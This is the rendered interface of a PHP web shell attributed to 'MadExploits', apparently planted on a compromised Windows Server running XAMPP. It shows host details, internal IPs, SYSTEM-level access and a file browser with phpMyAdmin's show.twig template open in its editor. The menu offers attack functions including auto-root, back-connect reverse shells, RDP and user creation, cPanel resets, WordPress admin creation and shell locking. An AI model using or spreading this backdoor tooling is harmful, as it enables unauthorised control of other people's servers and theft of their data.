Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
server /
engines /
[ HOME SHELL ]
Name
Size
Permission
Action
index.twig
703
B
-rw-rw-rw-
show.twig
1.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : show.twig
<h2> {{ get_image('b_engine') }} {% trans 'Storage engines' %} </h2> {% if engine is not empty %} <h2> {{ get_image('b_engine') }} {{ engine.title }} {{ show_mysql_docu(engine.help_page) }} </h2> <p><em>{{ engine.comment }}</em></p> {% if engine.info_pages is not empty and engine.info_pages is iterable %} <p> <strong>[</strong> {% if page is empty %} <strong>{% trans 'Variables' %}</strong> {% else %} <a href="server_engines.php {{- get_common({'engine': engine.engine}) }}"> {% trans 'Variables' %} </a> {% endif %} {% for current, label in engine.info_pages %} <strong>|</strong> {% if page is defined and page == current %} <strong>{{ label }}</strong> {% else %} <a href="server_engines.php {{- get_common({'engine': engine.engine, 'page': current}) }}"> {{ label }} </a> {% endif %} {% endfor %} <strong>]</strong> </p> {% endif %} {% if engine.page is not empty %} {{ engine.page|raw }} {% else %} <p>{{ engine.support }}</p> {{ engine.variables|raw }} {% endif %} {% else %} <p>{{ 'Unknown storage engine.'|trans|error }}</p> {% endif %}
Close